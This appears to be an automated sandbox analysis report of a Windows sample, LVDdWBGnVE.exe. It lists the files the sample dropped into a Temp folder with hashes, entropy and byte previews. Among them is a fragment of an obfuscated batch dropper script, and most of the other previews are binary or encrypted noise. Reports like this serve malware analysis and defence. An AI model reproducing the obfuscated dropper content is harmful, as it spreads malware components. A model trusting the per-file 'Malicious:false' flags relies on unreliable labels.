                                              Preview:IP......W..%..s..^.C...A../.~..tHs.....6.2..X.{-?n.sI....U.UiP.J...@...t..f....P..o.*m.+..-6..).JC..x.D..{5:.-T...:Au.}..+.....<fN..c`R*HV.........f..L...@.x...../..,..H$.......T8....$ym.h8...@v9....;W......b.S..<....x".0f.z.~.W.7....J......K...:"..4Aa.G.b.z....%...>. ...q:..k\.]O...BU.......%.(......0v....I.....&<Do..X.{g.o..j#.w..4.6.6."~j....O..s............{.6.).b.I8/....zQph~..{..(.(..L....e..$.*..R.g"|.Kll`....'yS.`.Sz9.s..\.D...Y..QNn.?#!..4...Ay.n.....(.F....f2.P...Q.o..s...5...=!.`.w....{j..>s!]|.]..5.h.T.(.@...B3........x.....BS..3..B.z.tZ.m.H,...x..5.i.Gl..v.@`.0.t@....,0...[.5.T....i...V...x..}.xW..~.....:.....v..cI.)...-..sHC...mK......xE.\*.8u./....qU....9.....+..x.MR].F...q..G<RoV.....?w..0...-...O.}....g..>....y...%8..s....WDx0...w...bLx9%.s.P,+a.....kL...q.....D..h....M._.C*......Y.M....r\....*...*...z...Fi....op....4..9..H..U[._..n..e.....,.J.3."...u.-....F.SGsM...H4*5|.v[.....8..D..)|.,NwpM.\..)_.tT.\;....)yg.h.

                                              C:\Users\user\AppData\Local\Temp\Aka

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):43101
                                              Entropy (8bit):7.995736975425293
                                              Encrypted:true
                                              SSDEEP:768:7UODqTAxIZz/hxqIygfLye2VmpNHQkcrouKgODnfl3KUQXKQ4wnPQkspK:7UODTxIjxqIPye2Vmp5QkuKg6daUu4Zm
                                              MD5:14422967D2C4B9A9A8A90E398B24F500
                                              SHA1:7031018AF43BCC5550A8B0A55680596D693334DC
                                              SHA-256:93DB8E88945B7DE88E98A7C50D64BFFA8B73C3B002C744C8D62C2EADF767CF6F
                                              SHA-512:4B5795F15774A7768A42AA3A2308B9366F47B30C92BABF688A67D2ABECA0037B63762F3E21154212DC5C8A31BCDD69F029E849E1D4DEF5676A04B64E2AE90C75
                                              Malicious:false
                                              Preview:.j.=.(K1..#|p....V.C.......].....H.........n._.U.....A1...5..&.QG.>.:..x_..6 \..M..O. ..}K6.-.~.U.Q.v..l...j5.x.V.......j#...M.T..9[M1....A..i..m.....*o..J.~......u...TI..F...i.Fkd...E...%V.D...[e..+F...".c.v..KY......Y.wEx4...!.$..;.pm&....pj&...Dy!....j....q._..v*.-GR.t.|YuZ-..r....6 y..n.....dT../..^...E/LMU.(..<4t` .....-.m0.....$.,..NJ.L...<.kc2.*..Nhu...'.{."..?d.5. ....!c.;...kWm...U.v..$s...t.....&..g.h..nX.......I~W.3..U....H...........i..$.qS..........}4.:Y.....g.*..WE.B.....I..>......[..$...Z....}..W.6.9....kj..!..;Fpwyl2F...p.x....Ze"#&.MMq.....H...........'......7......B.x.$..?l..M..e0.L.!...+.F.w`|.9z.%...A<.j..A.1.|s~..p.....r.o.....#...x..b.X'...S.R.YZ.".Ai...qI.s6Z&i.G.:.*.....Y.r...`.6..o...?5.........".......l... ..{\..8..I...T(h.....[......q....U.....0..pm.........X5/.3...>.....?m.~z....g...RX...H..B@..M.T^..^3...A....j.n.li.g.Z.....n[B..m.1.miR.a.+...8.u.....-.8.C..3.......U..'....r....']3C..m..k;l...3..;h,.Q...v

                                              C:\Users\user\AppData\Local\Temp\Anybody

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):123904
                                              Entropy (8bit):6.696121468639712
                                              Encrypted:false
                                              SSDEEP:3072:b2UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQSAZ:6UDtf0accB3gBmmLsiS+SAZ
                                              MD5:C89FD1314A2184D5D7B4A66DE377D5B2
                                              SHA1:F0EBBC2C8C6F9EBADC6ACE713AEC1B06F3F841E8
                                              SHA-256:9D1E82E2E430B87B28867FF9745A74E53A128671E9D300F111B1904786C2F856
                                              SHA-512:4B0B16E99D0CACAB0B7AF1D65CBF9226988752D8FA020B955BF54C634D9D64A05BB036EF590FA0D852D513621A84F4C3DC3C341AA8FEFFDF350DD8A5DBC75778
                                              Malicious:false
                                              Preview:.U...,S..M.VW.}.3..P.3.E.jN[.D...u..]..E.O...f9X..E.G.......E.H....E..........@.f;.......f;E.u...u4IG..f..A..v...f;E.t.f;E.t.f;E.u...._^[..F.r...N.l.....t...U..QQV...E.....3..E.W....tn.....FP.P...Y..ua..3.S.]....V....+tVH...tLf9.Vt....VP.h...Y..t.k.....E.....V.....B..3...f9.Vu....M..E...[_^..2......M..B...U..Vj.....D..Y.u........F....F.....^]...U....SVW.}...3.j.A.G.[.M..@.f9X...V......e....d....;.........m.....h.............:.t...uY..:.t...uS..:.........uI..]...;Z.~L..u>..;Z..A.U.B.U...u1.M...d....@...;...H..._^[.....P0.P0.P0.P0.@0..j.h.....:...U..Q...SVW.13.....M.x>..>.+....S..s...0.u......YY..x.~..{..M.;.~.;....._^[.....s.......V..~..t..~..Wu..~.........F.._.N.^.N..y...t.Q......~..F....V...(..j.V.=C..YY..^...U..V..W.F...........}.S..........j.[9_...4..................[.N.....4..._..^]...U..QSVW...G...................u?.u..~....O...j.Y9N..........6........../...O..........._^[.......................M...U..QQV..~..t..y......]..'...E....F.....^..U....SVW..

                                              C:\Users\user\AppData\Local\Temp\Campbell

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:ASCII text, with very long lines (515), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):11619
                                              Entropy (8bit):5.184884477970318
                                              Encrypted:false
                                              SSDEEP:192:YumLtVRO6Ny6FVAQjj20mdO7VVafUKi4y7WhBom3byypU+3AFcAEif/kRj13J2po:YLrRO6Nv3jmc7/af1o7g2T+3AFX/kRj5
                                              MD5:E7567EC4057933FA6E06322B7C08B72A
                                              SHA1:4E733E77915C7DFB7D25E31738E9D596962D4177
                                              SHA-256:1896EF25A6223F19F770DA125A4B1BC7C90815CCB682EC7CA780D231A01C28B0
                                              SHA-512:D8A14E5C8225AD8BDBB45317FD41588C12E9E60F1C9FF819D0D15CBC35801B82E7C7981B7DBC815666354950A7F5362FC00765F8A67C9478BD95DC5A31B12C83
                                              Malicious:false
                                              Preview:Set Meter=l..NiYfEarn-Evaluations-Default-Theoretical-Monitor-Summary-..umDCharacteristics-Bg-Browser-..oNWhite-Thereby-Sustainable-Forbidden-Surgeons-Policies-..AotYRibbon-Ma-Acids-Ppc-Helen-Kinase-Farming-Costume-..GLkmFp-Complicated-Hazardous-Pre-Connections-Nude-Yr-Leu-..xMWbChrome-Automobile-Promote-Golf-Changed-Proportion-..Set Richardson=L..LLRg-Yellow-Relatively-Passes-True-Deny-Draw-Condos-..WzlNSenate-Squad-England-Positions-Insider-Parameters-Doctors-..QHAgNeural-Loving-Haven-Father-Mortgages-..gtDYResumes-Grass-Rj-Mere-Files-Kissing-Orlando-Skilled-Lovely-..PUJDocumented-Believed-Lender-Specs-..tuSecretariat-Porno-Philadelphia-Msgstr-Needs-Seconds-..mIkGlossary-Trigger-Athens-Symptoms-Pulse-Motorcycle-Fall-Affairs-..NQPHThat-Erotic-Mud-Rhode-Determining-Handmade-Ten-..uFtUThose-Specified-Emotions-Anthony-Wed-Mixing-Albany-..BlSensors-Different-..Set Joy=e..jOeRom-Kills-Summaries-Brunei-Surrounded-Enable-Malpractice-Dr-..hHArea-Lenses-Considering-Polyphonic-Mounting-..QnwVen

                                              C:\Users\user\AppData\Local\Temp\Campbell.cmd (copy)

                                              Download File
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:ASCII text, with very long lines (515), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):11619
                                              Entropy (8bit):5.184884477970318
                                              Encrypted:false
                                              SSDEEP:192:YumLtVRO6Ny6FVAQjj20mdO7VVafUKi4y7WhBom3byypU+3AFcAEif/kRj13J2po:YLrRO6Nv3jmc7/af1o7g2T+3AFX/kRj5
                                              MD5:E7567EC4057933FA6E06322B7C08B72A
                                              SHA1:4E733E77915C7DFB7D25E31738E9D596962D4177
                                              SHA-256:1896EF25A6223F19F770DA125A4B1BC7C90815CCB682EC7CA780D231A01C28B0
                                              SHA-512:D8A14E5C8225AD8BDBB45317FD41588C12E9E60F1C9FF819D0D15CBC35801B82E7C7981B7DBC815666354950A7F5362FC00765F8A67C9478BD95DC5A31B12C83
                                              Malicious:false
                                              Preview:Set Meter=l..NiYfEarn-Evaluations-Default-Theoretical-Monitor-Summary-..umDCharacteristics-Bg-Browser-..oNWhite-Thereby-Sustainable-Forbidden-Surgeons-Policies-..AotYRibbon-Ma-Acids-Ppc-Helen-Kinase-Farming-Costume-..GLkmFp-Complicated-Hazardous-Pre-Connections-Nude-Yr-Leu-..xMWbChrome-Automobile-Promote-Golf-Changed-Proportion-..Set Richardson=L..LLRg-Yellow-Relatively-Passes-True-Deny-Draw-Condos-..WzlNSenate-Squad-England-Positions-Insider-Parameters-Doctors-..QHAgNeural-Loving-Haven-Father-Mortgages-..gtDYResumes-Grass-Rj-Mere-Files-Kissing-Orlando-Skilled-Lovely-..PUJDocumented-Believed-Lender-Specs-..tuSecretariat-Porno-Philadelphia-Msgstr-Needs-Seconds-..mIkGlossary-Trigger-Athens-Symptoms-Pulse-Motorcycle-Fall-Affairs-..NQPHThat-Erotic-Mud-Rhode-Determining-Handmade-Ten-..uFtUThose-Specified-Emotions-Anthony-Wed-Mixing-Albany-..BlSensors-Different-..Set Joy=e..jOeRom-Kills-Summaries-Brunei-Surrounded-Enable-Malpractice-Dr-..hHArea-Lenses-Considering-Polyphonic-Mounting-..QnwVen

                                              C:\Users\user\AppData\Local\Temp\Conferencing

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):133120
                                              Entropy (8bit):6.13525351023848
                                              Encrypted:false
                                              SSDEEP:3072:QFfTut/Dde6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAtsD:tt/Dd314V14ZgP0JaAOz04phdyD
                                              MD5:638E7812C5E9C55C5F339CC64D197B28
                                              SHA1:5EF8A953EF65AB7D0620A5D144F2C410E2A77A2F
                                              SHA-256:347A3459DD74AEA0A6B2F62955D1BC9BDB091BB66CA8A42274F7EBF310527FD8
                                              SHA-512:194B0D8799A83210968746C4D3E364EE512669E6080C6B3D215D97C141E8EF7F09152EA524691EFCD2276ACB1DC158FFD484E3F595DDF2CCEB690BD1996C8266
                                              Malicious:false
                                              Preview:..<......@..L0..|0..^t..I8Q.M....3.]...U..V.u....w...Q.E..E.....P...H....S...j...................@..L0..|0..^t..I8Q.M..+...3.]...U..V.u........Q.E..E.....P...H........j..................@..L0..|0..^t..I8Q.M.....3.]...U..V.u.......Q.E..E.....P...H.......j.............(......@..L0..|0..^t..I8Q.M..s...3.]...SVWj....j.......0y*...y..|7...L7.t..I8..A..|7...D7.t..@8.@.....+..4.I.......3.B..;.|.........9.t.B...;.~.3._^[.3.@..U..SVW.......................u7.............V.u...H.I...t!V............E...P....3.@.E...t.3..<.........Y...u..............P.......P............SP.v......_^[]...U..S.].V..W.C........0.9....{........r..C..p.....Y..;~.t..v....".....h..I....O.._^[]...U..VW.}...W........u..G..H....i.......3...........I._......^]...U..VW..j..g...g...&....U...Y.....J..N..B..F..B..F..B..F.....7_^]...V..W.>..t..O..3...j.W.....YYj.V.....YY_..^...U..QS.].........~#.u.........u..u.SP.\..YP..(M.......E.P.E.P.u..v.....taVWj$.y.....Y.O.....u..O...T)M..}.........;.t.P.....E...)M.

                                              C:\Users\user\AppData\Local\Temp\Debug

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):114688
                                              Entropy (8bit):6.560421732845139
                                              Encrypted:false
                                              SSDEEP:3072:NCThpmESv+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW8:NCThp6vmVnjphfhnvO5bLezW8
                                              MD5:D9DAF89D86B32DF3D7DA7EC1CFBF7212
                                              SHA1:59E1BA3DD32168A3D79A9DA2626C99C52970A53E
                                              SHA-256:06F48747A4ACB2EE437D03A9E8331CCA5C76EE5684E118F491E4FAF7799ADCC4
                                              SHA-512:24D26B6112417D75915F08562AF53EB1BB7DDEF2E89E779DB52AE0F674EA8CE102984FA2628CEE5588C7DC34DF00A32497E49EE18F7259C51E4D1C855AB69A6C
                                              Malicious:false
                                              Preview:..L$@.pJ.._^3.[..]...U.....E...T....@.SVW.0.....m....F..L$.Q.0....I..]....u:....s...#.3.B.S....H..|9...D9.t..@8.P..|9...D9.t..@8.@...$P....I..|$,3..t$0....r...C......3.{._^3.[..]...U.....E........@.SV..0..W3.......F...$....Q.0....I.............$.....D$D..$.....D$H..$.....D$<..$.....D$@..$.....D$4..$....Q.D$<....I..]..{..v..C..H...U.......tS...t'.D$4.D$L.D$8.D$P.D$4PP....I..D$.P.D$8.L.D$<.D$L.D$@.D$P.D$<PP....I..D$.P.D$@.%.D$D.D$L.D$H.D$P.D$DPP....I..D$.P.D$H.5..I.P..{...D$.........C..H..zT.......t..D$.P.D$PP........t........D$...........tA..D$.P..D$ P..D$"P..D$$P..D$&P..D$&P..D$(P..$....h4{L.P......$.6..D$.P..D$.P..D$ P..D$"P..D$"P..D$$P.D$|hDzL.P..... .M..D$dP.9........M..;....\$........Qj.V......L$..D$pQhl{L.P.n.......D$d.L$TP..=..P.L$$. ...j.j..D$(PV.5.......L$ .ip...L$T.XG....D$..t{L.P.D$hWP.........D$d.L$TP..<..P.L$$.....j.j..D$(PV.........L$ ..p...L$T..G....D$.P.D$hWP........D$d.L$TP.r<..P.L$$.{...j.j..D$(PV........L$ ..o...L$T.F....D$.P.D$hWP.y.......D$d.L$TP."<.

                                              C:\Users\user\AppData\Local\Temp\Discs

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):69632
                                              Entropy (8bit):7.997344187879081
                                              Encrypted:true
                                              SSDEEP:1536:oirK8ql4kgHb4nGpb4kT8K+AzjGeY7oG7H+L45/orwahlHxU:oieW7IGptgaKo0RoDlHxU
                                              MD5:00646A2066D51D9790F52BAE3C446C87
                                              SHA1:EBDA2B25B5A46CC6D9D5494050CC4B3A0BF81984
                                              SHA-256:57AFAB1CEC987DA27F5E92BAA6DC21D83F8C83EDF734FC590313102E75844C3A
                                              SHA-512:A74C02ED1B704912A8945E60CACC892F7E832E5CF15C87632B0FD3CBF9DDD8F36B01A5BA87FD7EF87D6BECBB297161BB69DC750B8DAC6F952892D45CD95F46F0
                                              Malicious:false
                                              Preview:.TC..x..Z..z....4...a.....|.u.,'2..9.....jw.....z..F%94[......Mo.K.....a.5+..?.7.a.1..M....|..)...Vg1..(dv.....!....gC:X..+..]<.... ...$=o\(.E..]Y?Kt...c .0....]....&.:.|.).1R.1.g'... .I..$.3fb..w..M....r.2...+I.fb.@uc$.R...A..%>E..1\.T.{...~.,.h.R..Z..G.E....?.v7i.~.e.Y.F.w.f.H.5....|q.....&j....:....R.4..'.f.!..CvT..U..7.W..Tg...p.w.9....k).......si2._.&..j.k....\.g&#..!x-...w./...i"L/!6..+...oZ.C..y.~....M.....!L...B.2.\T....s...3w...b..........%^..3.VM....3.Vg.nj.i f.w{.7.^v.$d..+?F....?.Z7..y.e.T.<..d....l.w....'.....u.....Ck...^p...Rlr.V..?6........3......J0...X.q;....mo..H..` ...`!.>.EBK.T..W.E(.....t...6..K..N.....7w33........=.......&.._.h..T.j.5a...p.....j's.*M...+......h....8-!....:.c.|..`a" .~M5.J.\Z....J..Gmq..w...d..`c..`......-..My5...n.4..l!...BqX.{..{.3..j..DJ7.C.*T..^...o...T.....p....Gc..<[.....{7G.%....1.%.l..C....i.H5....4..C....uT.gd....4$^.X.e.E.~hg0f..^....K.U.....(J.+..F.w......C.....J..^....J...D.......[....s

                                              C:\Users\user\AppData\Local\Temp\Dod

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):3386
                                              Entropy (8bit):7.608467285191016
                                              Encrypted:false
                                              SSDEEP:96:wIuzfJFFy4EDzHy5Xz+ppo+zAbQ6YhbBwGKGP5h3g:wISVSWMZMQ3rw
                                              MD5:682D77B5A6D22691A869AB4BEA11AD53
                                              SHA1:F56FAB8959A05C77570652F5F8E9E4103489E676
                                              SHA-256:C269725998F8F5ACDAB6A0067457065CC9059326EE0A38FF353C2939A0190C1B
                                              SHA-512:C42D04178ED59683FC4597B83496D7B3C61C1A075B4542ABB491C9639531F9737D70AE4172186FD6A3450C26701D794496BD4AE0F5E50DB8A3818CD78ED7FD27
                                              Malicious:false
                                              Preview:L...SL.....IUOu..oJ..j....0N..s.^....}K.,..k...Y7..,.E..n.u....[/..=}..0...{|...Q.....0.QV`.|.="...$S'...H.',y.<.....>.J.!.b...0....H'|.uB.k..k...X4...P..{...H.+U..% ..Q..c...lraJ..C..W..<.....1.....@l ..-...m..q.R!.>...9..../z ......-....j..<.....SM.GY|..CA.%.,.~.....}....`r@P. .CD..... Y.x.j.".0..G0../.........@B@.."..lq.0...*.H........0L1 0...U....GlobalSign Root CA - R31.0...U....GlobalSign1.0...U....GlobalSign0...190220000000Z..290318100000Z0L1 0...U....GlobalSign Root CA - R61.0...U....GlobalSign1.0...U....GlobalSign0.."0...*.H.............0...........s.f....{<....E.,..H..[<...A.3..o..*...k.......Q.!.J..Z...M:...df....D.s.N..Oxc...PmBf/M.y(MR........~..dL!.Ch.=<..f...1...m2..........cP.......y...*.p.{..mS.H|...8.f.wa~..<.....J..m......aw.Xt..#:.]:....]D-...W..~.P.c4.k...k6.9.$6.....W.....s..5.E...6.oT..rVn...QBD....8..NNZ.G..6Iw0.q7..!.u..a.?w.....l..Mt....9...^.........n....af.j..:e.Y..5...(....p....u..:......%....'YLv9[........

                                              C:\Users\user\AppData\Local\Temp\Ejaculation

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):151552
                                              Entropy (8bit):5.143694165278638
                                              Encrypted:false
                                              SSDEEP:1536:TdKaj6iTcPAsAhxjgarB/5el3EYrDWyu0uF:Th6whxjgarB/5elDWy4F
                                              MD5:2E9E29F8ED97F2DE8EBB1652BDBD545A
                                              SHA1:5577D360B25DAFFA0AF907FC5D852894B784F81D
                                              SHA-256:AEB399054CFF321F752D4F93143815FF1A2CC2398668C2E1110065A2C6F502F1
                                              SHA-512:F4F925DAF3F576441D2B7A0E250A51400B23E714D76870A640734912DA783D83AC113586F121161D96D7F06EB70B8D89EB4E0524D591232B0B2A342063E8BCB6
                                              Malicious:false
                                              Preview:............r.......r...............................................r.....................r...........r.r...................r.......r.........r.r.r.r.r.r.r.....r.r.r.r.r.r.r...r.........r.r.....................r.....r.r.r.r.r.r.r.r.r.r.r.r.r.r.......r.................r.......r...................................................................................r.r.................r.......r...........r.r.r.r.r.r.r.r...r.r.r.r.r.r.r.r.........r.r.................................r.r.r...............r.r.....r.....................................r.r.r.................................................r...................r...r.r...............r.r.r...r.r.r.r.............r...r.................r.r.r.r.r.r.....................r.r.......r.r.r.r.r.r.r.r.r.r.r.r.....................................................................................................................r.r.r.r................................. .!.!.!.!.!.!.!.!.!.!. . .r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.

                                              C:\Users\user\AppData\Local\Temp\Execution

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):114688
                                              Entropy (8bit):6.675787508464099
                                              Encrypted:false
                                              SSDEEP:3072:9nVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nE0:9VIPPL/sZ7HS3zcNPj0nE0
                                              MD5:42FB34DDB94507C5A125BF02C2983904
                                              SHA1:4E400C020121235E3DE490F5CBB38C4A25E686DC
                                              SHA-256:D59EFEA25D1E316B8A9248F52081AB14113C97603F3E90D533F4F373F743B3C7
                                              SHA-512:639D90CD1CD451EBCB9E5E1C165F7EEBB62B30D6BF24C596990CA40E08BCE5D0B5864E7A4F0A83624C7CF9AC4EC5C1E7385F59602B206F3346554D62721CD71D
                                              Malicious:false
                                              Preview:..=....u .............................}...$t&..@t!..`t.......r.......v.......s.3........;E...9....E.M.@.E.;...m.................}..E..........]....F|.E.;...l..........}....}...E.t6.E..%....=....u%......................}.....E.......U.............L.........E.,K.......K..F|.M.;..........E.}..........t-..%....=....u...G.......%....................U.............L.........E.,K.......K............1L.t....<p.E.}..;...w......E.u..].}........t ;.r.;.....v..Fh..............A...M.A.M.;M........M.U..E.......}...G............3A...$...E..}..E........|.N|;........V...t..u.F.PQ.............:....,.V....+.;.w f..f;F4u..........f.G.f;F6.............t1.G.;F|r).~..u#.~..u.f..f;F4u..Fh..............@...N|....}.;.s.f.......f#.....f;.u.....}..E.@.E.;E...7.........}......;........N|.E.;...........}.;.s$f...E.....f#E..E.....f;E.E.u.....}.B;.~......F|..}.+.;...-......M.}......}..E..........s....F|;...v............}.%......=....u!............%...............}.....w*t....tD.A.......

                                              C:\Users\user\AppData\Local\Temp\Genre

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):90112
                                              Entropy (8bit):7.997966981425173
                                              Encrypted:true
                                              SSDEEP:1536:ju/rDNkncHkrP9rRrANgBdCQYqZ7yhjYP/G9ye4nMRuU/DpFracF+l72Jxj6tU:jANkncHA9NpCQzeencyjFUrpFracC2F
                                              MD5:5CE4409C4AAA9FD5A27EC4974734F1DF
                                              SHA1:BF7EE5465EF96EE0186388B5B0685AD727ED9493
                                              SHA-256:A401B4CD0AFBAEE57D8025BF4FCE12583C825CBC2E3D3F308EB0627CD5BBA412
                                              SHA-512:1155B1C58221BA1C809D9D60CD440EBD8788DCD3169EE87BDA72FB7061B1E2F849F8BC79AC7053DF5DE8BC7955DB088DF778AF66900D6F303BDE6D61925014E6
                                              Malicious:false
                                              Preview:IP......W..%..s..^.C...A../.~..tHs.....6.2..X.{-?n.sI....U.UiP.J...@...t..f....P..o.*m.+..-6..).JC..x.D..{5:.-T...:Au.}..+.....<fN..c`R*HV.........f..L...@.x...../..,..H$.......T8....$ym.h8...@v9....;W......b.S..<....x".0f.z.~.W.7....J......K...:"..4Aa.G.b.z....%...>. ...q:..k\.]O...BU.......%.(......0v....I.....&<Do..X.{g.o..j#.w..4.6.6."~j....O..s............{.6.).b.I8/....zQph~..{..(.(..L....e..$.*..R.g"|.Kll`....'yS.`.Sz9.s..\.D...Y..QNn.?#!..4...Ay.n.....(.F....f2.P...Q.o..s...5...=!.`.w....{j..>s!]|.]..5.h.T.(.@...B3........x.....BS..3..B.z.tZ.m.H,...x..5.i.Gl..v.@`.0.t@....,0...[.5.T....i...V...x..}.xW..~.....:.....v..cI.)...-..sHC...mK......xE.\*.8u./....qU....9.....+..x.MR].F...q..G<RoV.....?w..0...-...O.}....g..>....y...%8..s....WDx0...w...bLx9%.s.P,+a.....kL...q.....D..h....M._.C*......Y.M....r\....*...*...z...Fi....op....4..9..H..U[._..n..e.....,.J.3."...u.-....F.SGsM...H4*5|.v[.....8..D..)|.,NwpM.\..)_.tT.\;....)yg.h.

                                              C:\Users\user\AppData\Local\Temp\Marijuana

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):59392
                                              Entropy (8bit):6.7675117089438706
                                              Encrypted:false
                                              SSDEEP:1536:To2+9BGmdATGODv7xvTphAiPChgZ2kOEb:TNoGmROL7F1G7ho2kO6
                                              MD5:D830821FE60D6CD810FB9EC7102838F3
                                              SHA1:9264B78903FA373E0A1B697CC056DECC1DFAFB5F
                                              SHA-256:00A96AC0E8600A9FA0A00EF1F939B58BE93618C4FE4E3BE9D0BFAB0A4A0FF57D
                                              SHA-512:2A8E2BB9D599964CA112AACBB0FDA37C01466898A7AF5D7C8543013949B0BC6E5665402692A1072845B1A72211D350963C608A81A7C3450C19A56A948CED5D4D
                                              Malicious:false
                                              Preview:>x....7..C.....#.G..J....-.".Z{{.Uw..(.J...p.I.6..Q...!.i...<4....N..mP.~.....M...tttX.e...g.....".7..L..H..+... ..G....v.......^....#..d29.....9y... O..a.7.<.....8O..s.......e..q..DDU.o....S...D.......pQ......6.=<...E.........P...".g.z.....91.M.5.B......{...q>;..WE...d.~~.}.....+".GN{.~....xxw..Zk....F...z.X.e...x<.......I3....p`.......=.........h...nH...K5..!.....U.CU....h..x.p?....Z...w..}I.=2@:......-U.C.W.....x.x.V!..>C..T......'..E..."Uu....?.u.Am.fc/.l.1...p.T..Tg.8....:.<{d..t.[....T.g....=..s....y`.<.....%".T..8...v.l.'....A&..V....x+.:2..~G....."r.^...#.......<....MC80...=<HO{.+...@.h.c;8<.vJ...(./....x....y.w..F.......2...;;x.p.7f...oj. O....p..*.7...H$.=._\.;*.._Q.?.Y.oG.grh(.S..H.B^`..=CDHF[x.`.GG:.L3.T....W....B......0.#.......G.t...:.....q...P?..u..tU..a...h../.../--.2....zz...o.X..'o0...l..2........../....d.L....wg.....D.]DF.M8wBK...]i...WO.dln.U.V..;...0.:2...g~U....5....z..T.$"_...0........!..........z.|...Gv...K7.

                                              C:\Users\user\AppData\Local\Temp\Mj

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):99328
                                              Entropy (8bit):7.998576390696709
                                              Encrypted:true
                                              SSDEEP:1536:cD6KkwPhsASDYs8rp/KWY8Xr1OWgxQFn/LbctRaCiUO7QOZg2hc9nW0iH:c+KVhtSQzY8713n/H+O7rGW0K
                                              MD5:FF77A17E4CADE79760F0F8B87C857C6C
                                              SHA1:B05075D65229AF0063E6E85DA14AB940062818DD
                                              SHA-256:CC8A9523B67F764E447CD5042751E1DE77B04FFC5664E6F5C41D1C3CCE0EC60D
                                              SHA-512:6DF97DCB14736D2F0CE9762B7246050B488E054375C78F42294119D80CACEDCF53F4B3868B7A4C948DD7B1F9545B4135F5BD5ED69611424129CAE63A372994D0
                                              Malicious:false
                                              Preview:K....A.h..j..X.Tr.dxRn-.3.N..+[...#.v5.>.".y....oA.....;.W.T7....B.u3.y.=....c.t...i.....>...Rj@H....,'..l. .\+.^.l.mE.W..).....,]...J..r..m...~...O........."H.>.=P..8...+.L.}.M...[.CLM-V...&\.3..o@..{.DtN.>.........mCE.../..R..\..t.H.OgefD.Y..w.....F........B.-.....|B......4%.:K..^....|.. X.l.s..M.Q.|.......+-..i......s.O...;.Y.<......[.Z..d.R.>.l.b.M.=.[k..k@...m.Z..........XP.C."....1,."...1........l.Iz%.......b.>...$^kr.+.Wk.l.~a.........^..;~....wvN..N......:...p.\..h2Yi....F..Sw1I.mf..7..t.}....."..;..,\...A.JB..S[.T....H..g..&..o;..I.;N..c..P`9.[....c.R{[...1.:..A.O.*.....0...VuY.....y..b...O.a.D...\[..66Og.....h.T..z...ZEoN.VA.DQ.`._.....R.X.c:......b..9X{...eNP.x4.......S..O....%..z'..Q.,...q. ....y..4........h.......B.8..zu.L.0Ja.:.q.Q.I....8I..u..sN|....z...7.........O..5.._vb]...WD7EF.S.o......"`.......`....q.....r>.......!ar.`.r.F7g9.|....Oea.hX.S.'0i=......Lfx.L.A0..kMbP.[}.{..Z.oP..|xs...!..s.@.>....$0.S.1.E......;.7..

                                              C:\Users\user\AppData\Local\Temp\Mysterious

                                              Download File
                                              Process:C:\Users\user\Desktop\LVDdWBGnVE.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):91136
                                              Entropy (8bit):7.998131058926633
                                              Encrypted:true
                                              SSDEEP:1536:2Ifwsyt1Vj+tpNuEroTuyisZj6b3nlPw2gIPNBcYxZA+eGth3WQjR7:LIDDctDt/jsZAn1w23NB/dJWKR
                                              MD5:BEEF30C9A0C6A41985E081CD4FF23049
                                              SHA1:4E09FFAF608BAF3A98CD94794CB7CC23E41C3086
                                              SHA-256:FC64F325CDD473ADB5B7C15221F7B2773A064395612EFF9AD1C76FA973A6738A
                                              SHA-512:EC71CDB716B684B241A2FA2BCA84CBCED9AA86BA0954009DC003EF1F80640C01D49911EC6E031E9F8E8139D30BF5A77D7A79EE38F66B8FD43A6E4F957CB8E1CA
                                              Malicious:false
